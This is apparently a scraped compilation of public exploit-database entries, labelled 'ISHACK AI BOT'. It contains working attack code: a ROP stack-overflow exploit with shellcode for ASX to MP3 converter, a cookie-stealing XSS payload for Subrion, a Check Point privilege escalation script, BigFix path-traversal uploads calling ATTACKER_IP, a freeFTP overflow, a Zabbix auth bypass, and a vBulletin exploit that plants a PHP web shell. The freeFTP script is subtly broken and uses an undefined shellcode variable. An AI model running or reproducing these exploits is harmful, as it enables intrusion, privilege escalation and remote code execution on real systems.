ISHACK AI BOT

# Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP) # Google Dork: N/A # Date: 2019-10-06 # Exploit Author: max7253 # Vendor Homepage: http://www.mini-stream.net/ # Software Link: https://www.exploit-db.com/apps/f4da5b43ca4b035aae55dfa68daa67c9-ASXtoMP3Converter.exe # Version: 3.1.3.7.2010.11.05 # Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC # CVE : N/A # Note: There is a similar exploit published but it doesn't work in the OS I used: # https://www.exploit-db.com/exploits/42963 # This exploit in the ROP chain uses addresses from ASLR modules. Not sure what OS that exploit was tested on. import struct file = 'fuzz_rop.asx' #Tested on #OS Name: Microsoft Windows 7 Enterprise #OS Version: 6.1.7601 Service Pack 1 Build 7601 #System Type: x64-based PC #msfvenom -p windows/exec cmd=calc.exe -a x86 -b '\x00\x09\x0a' -f python buf = b"" buf += b"\xda\xd7\xbf\xf1\xca\xd1\x3f\xd9\x74\x24\xf4\x5a\x29" buf += b"\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x14\x03\x7a\xe5\x28" buf += b"\x24\xc3\xed\x2f\xc7\x3c\xed\x4f\x41\xd9\xdc\x4f\x35" buf += b"\xa9\x4e\x60\x3d\xff\x62\x0b\x13\x14\xf1\x79\xbc\x1b" buf += b"\xb2\x34\x9a\x12\x43\x64\xde\x35\xc7\x77\x33\x96\xf6" buf += b"\xb7\x46\xd7\x3f\xa5\xab\x85\xe8\xa1\x1e\x3a\x9d\xfc" buf += b"\xa2\xb1\xed\x11\xa3\x26\xa5\x10\x82\xf8\xbe\x4a\x04" buf += b"\xfa\x13\xe7\x0d\xe4\x70\xc2\xc4\x9f\x42\xb8\xd6\x49" buf += b"\x9b\x41\x74\xb4\x14\xb0\x84\xf0\x92\x2b\xf3\x08\xe1" buf += b"\xd6\x04\xcf\x98\x0c\x80\xd4\x3a\xc6\x32\x31\xbb\x0b" buf += b"\xa4\xb2\xb7\xe0\xa2\x9d\xdb\xf7\x67\x96\xe7\x7c\x86" buf += b"\x79\x6e\xc6\xad\x5d\x2b\x9c\xcc\xc4\x91\x73\xf0\x17" buf += b"\x7a\x2b\x54\x53\x96\x38\xe5\x3e\xfc\xbf\x7b\x45\xb2" buf += b"\xc0\x83\x46\xe2\xa8\xb2\xcd\x6d\xae\x4a\x04\xca\x40" buf += b"\x01\x05\x7a\xc9\xcc\xdf\x3f\x94\xee\x35\x03\xa1\x6c" buf += b"\xbc\xfb\x56\x6c\xb5\xfe\x13\x2a\x25\x72\x0b\xdf\x49" buf += b"\x21\x2c\xca\x29\xa4\xbe\x96\x83\x43\x47\x3c\xdc" payload = "http://" payload += "A" * 17417 + struct.pack('<L', 0x1002D038) + "CCCC" ## Save allocation type (0x1000) in EDX payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x11111111) payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN payload += struct.pack('<L', 0xEEEEFEEF) payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x41414141) ## Save the address of VirtualAlloc() in ESI payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN [MSA2Mfilter03.dll] payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll] payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll] payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN payload += struct.pack('<L', 0x41414141) payload += struct.pack('<L', 0x41414141) ## Save the size of the block in EBX payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN ## Save the address of (# ADD ESP,8 # RETN) in EBP payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN #payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN ## Save memory protection code (0x40) in ECX payload += struct.pack('<L', 0x1002ca22) # POP ECX # RETN payload += struct.pack('<L', 0xFFFFFFFF) payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN ## Save ROP-NOP in EDI payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN payload += struct.pack('<L', 0x1002D038) # RETN ## Save NOPs in EAX #payload += struct.pack('<L', 0x1003bca4) # POP EAX # RETN [MSA2Mfilter03.dll] #payload += struct.pack('<L', 0x90909090) # nop ## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN payload += struct.pack('<L', 0xA4E2F275) payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN payload += "\x90" * 4 payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN payload += "\x90" * 20 payload += buf f = open(file,'w') f.write(payload) f.close()

# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting # Date: 2019-10-07 # Author: Min Ko Ko (Creatigon) # Vendor Homepage: https://subrion.org/ # CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225 # Website : https://l33thacker.com # Description : Allows XSS via the panel/members/ Username, Full Name, or # Email field, aka an "Admin Member JSON Update" issue. First login the panel with user credential, Go to member tag from left menu. http://localhost/panel/members/ Username, Full Name, Email are editable with double click on it. Insert the following payload <img src=x onerror=alert(document.cookie)>

# Exploit Title: CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation # Date: 2019-01-30 # Exploit Author: Jakub Palaczynski # Vendor Homepage: https://www.checkpoint.com/ # Version: Check Point Endpoint Security VPN <= E80.87 Build 986009514 # Version: Check Point ZoneAlarm <= 15.4.062.17802 # CVE: CVE-2019-8452 Description: ============ It is possible to change permissions of arbitrary file so that user have full control over it after exploitation which results in Local Privilege Escalation. It was found that Check Point software (Endpoint Security Client and ZoneAlarm) uses tvDebug.log file stored in "C:\Windows\Internet Logs\tvDebug.log" or in ProgramData, for example "C:\ProgramData\CheckPoint\ZoneAlarm\Logs\tvDebug.log". Over this log file all authenticated users have full control and it was found that Check Point service writes to it with SYSTEM privileges. However this file could not be used for exploitaion as it is always used/taken by Check Point service so for example this is why users cannot delete it in normal conditions (unless service crashes and/or is restarted). However it was noticed that when this log file reaches some limit (depending on software) then it is archived to the same location and name but with ZIP extension. The same permissions are set for this archive file so all authenticated users can access it. Taking all of this into account we can create an attack scenario: 1. If tvDebug.zip file exists then delete it 2. Create hardlink (using CreateHardlink.exe) named tvDebug.zip which points to other file that we would like to have permissions to (this file must not be taken by other process when Check Point service tries to use it) 3. Fill tvDebug.log log file above the limit. For ZoneAlarm it is 50Mb, for VPN it is 20Mb. It can be done by using software as normal user. 4. Restart system as service needs to be restarted to make an archive. 5. Now your file has permissions changed and you have all access to it. 6. If we pointed to "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" in step 2 then we can replace this DLL with custom one. 7. Click "VPN Options" in Client GUI and then close this windows. Closing "VPN Options" window forces LogonISReg.dll to be loaded with SYSTEM privileges. Proof of Concept: ================= # PoC written in PowerShell to fully exploit Check Point Endpoint Client. It can be used also to exploit ZoneAlarm. # file that we want to have permissions to # LogonISReg.dll is not used on startup and we can force to load it with SYSTEM privileges after exploitation $file = "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" # path to symboliclink testing tools CreateHardlink.exe # CreateHardlink.exe is a tool created by James Forshaw - https://github.com/googleprojectzero/symboliclink-testing-tools $hardlink = "C:\Temp\CreateHardlink.exe" Write-Host "[!] Detecting Check Point software." if ([System.IO.File]::Exists("$env:windir\Internet Logs\tvDebug.log")) { $logfile = "$env:windir\Internet Logs\tvDebug.zip" Write-Host "[+] Check Point Endpoint Security found." } elseif ([System.IO.File]::Exists("$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.log")) { $logfile = "$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.zip" Write-Host "[+] Check Point ZoneAlarm found." } else { Write-Host "[-] Check Point software was not found." } Write-Host "[!] Trying to delete tvDebug.zip file." if ([System.IO.File]::Exists($logfile)) { while ([System.IO.File]::Exists($logfile)) { Remove-Item -Force 朴ath $logfile -ErrorAction SilentlyContinue } Write-Host "[+] Successfully deleted tvDebug.zip archive file." } else { Write-Host "[+] tvDebug.zip archive file was not found." } Write-Host "[!] Creating hardlink to a file that we would like to change permissions." Start-Process -FilePath "cmd.exe" -ArgumentList "/c $hardlink `"$logfile`" `"$file`"" while (!([System.IO.File]::Exists($logfile))) { Sleep 1 } Write-Host "[+] Hardlink successfully created." Write-Host "[!] 1. Fill log file up to the limit and restart computer." Write-Host "[!] 2. Now when permissions are changed replace LogonISReg.dll with your custom DLL." Write-Host "[!] 3. Click VPN Options in Client GUI and close this window to force DLL load."

# Exploit Title: IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload # Date: 2018-12-11 # Exploit Authors: Jakub Palaczynski # Vendor Homepage: https://www.ibm.com/ # Version: IBM Bigfix Platform <= 9.5.9.62 # CVE: CVE-2019-4013 Description: ============ Any authenticated (even unprivileged) user can upload any file to any location on the server with root privileges. This results in code execution on underlying system with root privileges. What caused this issue: * path traversal - it is possible to escape from original directory and upload file to any other location * server running with root privileges - user can upload file to ANY location on the system * upload any type of file - application does not verify extension and MIME type of uploaded files * authorization bypass (reported as separate issue) - any user can reveal privileged functionality and access it without proper rights set * possibility to win the race - application uploads file to location specified in "urlFileName" parameter (path traversal), however it then moves it to another. An attacker needs to win race and execute script before it is moved. Issue was found in "Apps > Software > Add Software" menu. Here user needs to choose upload via URL option as only this one is vulnerable. URL needs to point to attacker's web server where he hosts for example script files. When form is submitted we can see on proxy "urlFileName" parameter. This one is vulnerable to path traversal. This parameter specifies temporary file name that will be used on the system. Then application moves this file to another location that is not controlled by application user. An attacker can for example upload script file on the web server and execute it by sending GET request. However as a PoC we will use cron. Here we upload 2 files - cron file and script file that will be executed by cron. Uploading cron task and script file is the same as below but of course with different content downloaded from the web server. Those two HTTP requests should be sent in loop to finally win a race and execute our script. Proof of Concept: ================= cron.txt served on attacker's web server: * * * * * root bash /tmp/icmp.sh icmp.txt served on attacker's web server: #!/bin/bash ping -c 3 ATTACKER_IP Uploading cron task: POST /swd/api/packages/upload HTTP/1.1 Host: XXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Content-Length: 846 Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809 X-XSRF-TOKEN: XXX Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX Connection: close -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="fileURL" http://ATTACKER_IP/cron.txt -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="username" -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="password" -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="urlFileName" ../../../../../../../../etc/cron.d/task -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="urlDownloadAtRuntime" false -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="uploadId" user_1543410578364620 -----------------------------7289782871626994727576601809-- Uploading script file: POST /swd/api/packages/upload HTTP/1.1 Host: XXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Content-Length: 846 Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809 X-XSRF-TOKEN: XXX Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX Connection: close -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="fileURL" http://ATTACKER_IP/icmp.txt -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="username" -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="password" -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="urlFileName" ../../../../../../../../tmp/icmp.sh -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="urlDownloadAtRuntime" false -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="uploadId" user_1543410578364620 -----------------------------7289782871626994727576601809-- After a while our script should be executed with root privileges.

# Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow # Date: 2019-09-01 # Author: Chet Manly # Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html # Version: 1.0.8 # CVE: N/A from ftplib import FTP buf = "" buf += "\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d" buf += "\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65" buf += "\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e" buf += "\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b" buf += "\x43\x42\x64\x68\x36\x6f\x58\x37\x32\x6a\x55\x76\x36" buf += "\x51\x79\x6f\x6c\x6c\x77\x4c\x61\x71\x43\x4c\x63\x32" buf += "\x56\x4c\x47\x50\x6b\x71\x5a\x6f\x34\x4d\x45\x51\x6f" buf += "\x37\x68\x62\x6a\x52\x76\x32\x70\x57\x4c\x4b\x73\x62" buf += "\x44\x50\x4c\x4b\x72\x6a\x77\x4c\x6c\x4b\x72\x6c\x57" buf += "\x61\x52\x58\x49\x73\x47\x38\x33\x31\x68\x51\x66\x31" buf += "\x6c\x4b\x31\x49\x55\x70\x47\x71\x69\x43\x6c\x4b\x72" buf += "\x69\x32\x38\x39\x73\x64\x7a\x63\x79\x4c\x4b\x37\x44" buf += "\x6c\x4b\x66\x61\x4a\x76\x35\x61\x39\x6f\x6c\x6c\x6f" buf += "\x31\x68\x4f\x54\x4d\x33\x31\x78\x47\x35\x68\x49\x70" buf += "\x30\x75\x49\x66\x45\x53\x51\x6d\x49\x68\x37\x4b\x73" buf += "\x4d\x61\x34\x71\x65\x6d\x34\x36\x38\x4c\x4b\x32\x78" buf += "\x65\x74\x66\x61\x6a\x73\x65\x36\x4c\x4b\x74\x4c\x30" buf += "\x4b\x4c\x4b\x51\x48\x57\x6c\x75\x51\x6a\x73\x6c\x4b" buf += "\x53\x34\x6e\x6b\x43\x31\x4a\x70\x4d\x59\x53\x74\x66" buf += "\x44\x55\x74\x53\x6b\x31\x4b\x63\x51\x36\x39\x62\x7a" buf += "\x62\x71\x69\x6f\x6d\x30\x71\x4f\x51\x4f\x71\x4a\x4e" buf += "\x6b\x62\x32\x6a\x4b\x6e\x6d\x53\x6d\x70\x6a\x47\x71" buf += "\x4c\x4d\x4e\x65\x4c\x72\x53\x30\x65\x50\x47\x70\x66" buf += "\x30\x30\x68\x65\x61\x4c\x4b\x32\x4f\x4c\x47\x6b\x4f" buf += "\x69\x45\x4d\x6b\x6c\x30\x48\x35\x4e\x42\x71\x46\x52" buf += "\x48\x59\x36\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55" buf += "\x47\x4c\x33\x36\x53\x4c\x56\x6a\x6f\x70\x49\x6b\x6b" buf += "\x50\x73\x45\x37\x75\x6d\x6b\x31\x57\x46\x73\x63\x42" buf += "\x72\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x48\x55\x55" buf += "\x33\x35\x31\x32\x4c\x53\x53\x66\x4e\x55\x35\x72\x58" buf += "\x45\x35\x53\x30\x41\x41" buf = 'A' * 276 buf += '\x90' * 10 buf += shellcode buf += 'B' * (486 - len(shellcode)) buf += '\x58' # pop eax buf += '\xfe\xcc' # dec ah buf += '\xfe\xcc' # dec ah buf += '\xff\xe0' # jmp eax buf += 'C' * 4 buf += '\xe8\xf0\xff\xff\xff' # call near buf += 'D' * 9 buf += '\xeb\xf0\x90\x90' # jump backwards buf += '\xc0\x3d\x42\x00' # 0x00423dc0 - pop, pop, ret buf += 'E' * (1000 - len(buf)) ftp = FTP() ftp.connect('192.168.1.1', 21) ftp.login('anonymous', buf)

# Exploit Title: Zabbix 4.4 - Authentication Bypass # Date: 2019-10-06 # Exploit Author: Todor Donev # Software Link: https://www.zabbix.com/download # Version: Zabbix 4.4 # Tested on: Linux Apache/2 PHP/7.2 # # Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit # # Copyright 2019 (c) Todor Donev # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # (Dont do anything without permissions) # # # [ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit # # [ Exploit Author: Todor Donev 2019 <[email protected]> # # [ Initializing the browser # # [ >>> Referer => # # [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1 # # [ >>> Content-Type => application/x-www-form-urlencoded # # [ <<< Cache-Control => no-store, no-cache, must-revalidate # # [ <<< Connection => close # # [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT # # [ <<< Pragma => no-cache # # [ <<< Server => nginx # # [ <<< Vary => Accept-Encoding # # [ <<< Content-Type => text/html; charset=UTF-8 # # [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT # # [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT # # [ <<< Client-Peer => # # [ <<< Client-Response-Num => 1 # # [ <<< Client-SSL-Cert-Issuer => # # [ <<< Client-SSL-Cert-Subject => # # [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256 # # [ <<< Client-SSL-Socket-Class => IO::Socket::SSL # # [ <<< Client-SSL-Warning => Peer certificate not verified # # [ <<< Client-Transfer-Encoding => chunked # # [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css" # # [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly # # [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload # # [ <<< Title => TARGET: Dashboard # # [ <<< X-Content-Type-Options => nosniff # # [ <<< X-Frame-Options => SAMEORIGIN # # [ <<< X-Meta-Author => Zabbix SIA # # [ <<< X-Meta-Charset => utf-8 # # [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d # # [ <<< X-Meta-Msapplication-Config => none # # [ <<< X-Meta-Msapplication-TileColor => #d40000 # # [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png # # [ <<< X-Meta-Viewport => width=device-width, initial-scale=1 # # [ <<< X-UA-Compatible => IE=Edge # # [ <<< X-XSS-Protection => 1; mode=block # # [ # # [ The target is vulnerable. Try to open these links: # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1 # # [ https://TARGET/zabbix/overview.php?ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1 # # [ https://TARGET/zabbix/latest.php?ddreset=1 # # [ https://TARGET/zabbix/charts.php?ddreset=1 # # [ https://TARGET/zabbix/screens.php?ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1 # # [ https://TARGET/zabbix/srv_status.php?ddreset=1 # # [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1 # # [ https://TARGET/zabbix/hostinventories.php?ddreset=1 # # [ https://TARGET/zabbix/report2.php?ddreset=1 # # [ https://TARGET/zabbix/toptriggers.php?ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.list # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1 # #!/usr/bin/perl -w use strict; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; use HTML::TreeBuilder; my $host = shift || ''; # Full path url to the store $host =~ s|/$||; print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 print "[ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit\n"; print "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n"; print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/); print "[ Initializing the browser\n"; my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); $browser->timeout(30); $browser->agent($user_agent); my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); my $response = $browser->request($request); print "[ >>> $_ => ", $request->header($_), "\n" for $request->header_field_names; print "[ <<< $_ => ", $response->header($_), "\n" for $response->header_field_names; print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401'); print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403'); if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){ print "[\n[ The target is vulnerable. Try to open these links:\n"; my $tree = HTML::TreeBuilder->new_from_content($response->as_string()); my @files = $tree->look_down(_tag => 'a'); for my $line (@files){ next if ($line->attr('href') =~ m/javascript/); next if ($line->attr('href') =~ m/\#/); next if ($line->attr('href') =~ m/http/); print "[ ", $host."/zabbix/".$line->attr('href'), "\n"; } } else { print "[ Exploit failed! The target isn't vulnerable\n"; exit; }

# Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change # Date: 2019-09-10 # Exploit Author: Alessandro Magnosi # Vendor Homepage: http://www.sricam.com/ # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe # Version: v3.12.0.1 # Tested on: Windows 7 #!/usr/bin/python # Steps to reproduce: # 1. Generate the payload executing the PoC # 2. Login in the Sricam DeviceViewer application as any registered user # 3. Go to System Tools -> Change Password # 4. Set the old password as the malicious payload, and the new password as whatever you want # 5. The password will be changed with the new one # 6. To confirm, restart the application and try to login with the new password payload = "A" * 5000 try: bypass = open("bypass.txt","w") print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass") print("### Author: Alessandro Magnosi\n") print("[*] Creating old password file") bypass.write(payload) bypass.close() print("[+] Old password file created\n") print("[i] When changing password, set the old password to the file contents") print("[i] Close the program and reopen it") print("[i] Log in with new password") except: print("[!] Error creating the file")

<?php /* --------------------------------------------------------------------- vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability --------------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.vbulletin.com/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "data[extension]" and "data[filedata]" parameters to the "ajax/api/user/updateAvatar" endpoint is not properly validated before being used to update users' avatars. This can be exploited to inject and execute arbitrary PHP code. Successful exploitation of this vulnerability requires the "Save Avatars as Files" option to be enabled (disabled by default). [-] Disclosure timeline: [30/09/2019] - Vendor notified [03/10/2019] - Patch released: https://bit.ly/2OptAzI [04/10/2019] - CVE number assigned (CVE-2019-17132) [07/10/2019] - Public disclosure */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[-] cURL extension required!\n"); print "+-------------------------------------------------------------------------+"; print "\n| vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Exploit by EgiX |"; print "\n+-------------------------------------------------------------------------+\n"; if ($argc != 4) { print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n"; print "\nExample....: php $argv[0] http://localhost/vb/ user passwd"; print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n"; die(); } list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n"; curl_setopt($ch, CURLOPT_URL, $url); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login"); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}"); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n"); print "[-] Logged-in! Retrieving security token...\n"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n"); print "[-] Uploading new avatar...\n"; $params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture"); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_HEADER, false); if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n"); if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n"); print "[-] Updating avatar with PHP shell...\n"; $php_code = '<?php print("____"); passthru(base64_decode($_SERVER["HTTP_CMD"])); ?>'; $params = ["routestring" => "ajax/api/user/updateAvatar", "userid" => 0, "avatarid" => 0, "data[extension]" => "php", "data[filedata]" => $php_code, "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); if (curl_exec($ch) !== "true") die("[-] Update failed!\n"); print "[-] Launching shell...\n"; preg_match('/(\d+)\.jpeg/', $path, $m); $path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path); curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}"); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nvb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }

